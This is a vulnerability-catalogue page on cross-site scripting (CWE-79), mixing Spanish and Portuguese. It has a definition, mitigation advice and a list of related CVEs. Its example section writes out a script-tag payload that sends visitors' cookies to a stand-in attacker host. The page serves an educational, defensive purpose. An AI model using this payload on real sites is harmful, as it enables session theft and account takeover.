Fallos del tipo CWE-79

29.250 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-24510MEDIUMCross Site Scripting vulnerability in Alinto SOGo before 5.10.0 allows a remote attacker to execute arbitrary code via the import function tEPSS 0.5%CVE-2024-37297MEDIUMWooCommerce has a Cross-Site Scripting Vulnerability in checkout & registration formsEPSS 0.5%CVE-2026-77850HIGHStored XSS in AshAdmin relationship typeahead via unescaped label_field contentEPSS 0.5%CVE-2022-27880MEDIUMOn F5 Traffix SDC 5.2.x versions prior to 5.2.2 and 5.1.x versions prior to 5.1.35, a stored Cross-Site Scripting (XSS) vulnerability existsEPSS 0.5%CVE-2019-25105LOWdro.pm fileman.php cross site scriptingEPSS 0.5%CVE-2021-23980MEDIUMA mutation XSS affects users calling bleach.clean with all of: svg or math in the allowed tags p or br in allowed tags style, title, noscripEPSS 0.5%CVE-2021-24586—Per Page Add to Head < 1.4.4 - CSRF to Stored XSSEPSS 0.5%CVE-2021-24431—Language Bar Flags <= 1.0.8 - CSRF to Stored XSSEPSS 0.5%CVE-2024-2133LOWBdtask Isshue Multi Store eCommerce Shopping Cart Solution Manage Sale Page manage_invoice cross site scriptingEPSS 0.5%CVE-2024-24945MEDIUMA stored cross-site scripting (XSS) vulnerability in Travel Journal Using PHP and MySQL with Source Code v1.0 allows attackers to execute arEPSS 0.5%CVE-2025-64539CRITICALAdobe Experience Manager | Cross-site Scripting (DOM-based XSS) (CWE-79)EPSS 0.5%CVE-2026-72729LOWDiscourse: Stored XSS in discourse-local-dates pluginEPSS 0.5%CVE-2026-53555MEDIUMStored XSS via SVG UploadEPSS 0.5%CVE-2023-7314MEDIUMNagios XI < 5.11.3 XSS via Bandwidth ReportEPSS 0.5%CVE-2023-2999MEDIUMCross-site Scripting (XSS) - Stored in thorsten/phpmyfaqEPSS 0.5%CVE-2023-49158HIGHWordPress LadiApp plugin <= 4.4 - Broken Access Control lead to XSS vulnerabilityEPSS 0.5%CVE-2024-47947MEDIUMStored cross site scriptingEPSS 0.5%CVE-2026-27169HIGHOpenSift: Persistent XSS Chat Tool RenderingEPSS 0.5%CVE-2023-4271MEDIUMPhotospace Responsive <= 2.1.1 - Authenticated (Administrator+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2023-2436MEDIUMBlog-in-Blog <= 2.0.0 - Authenticated (Editor+) Stored Cross-Site Scripting via ShortcodeEPSS 0.5%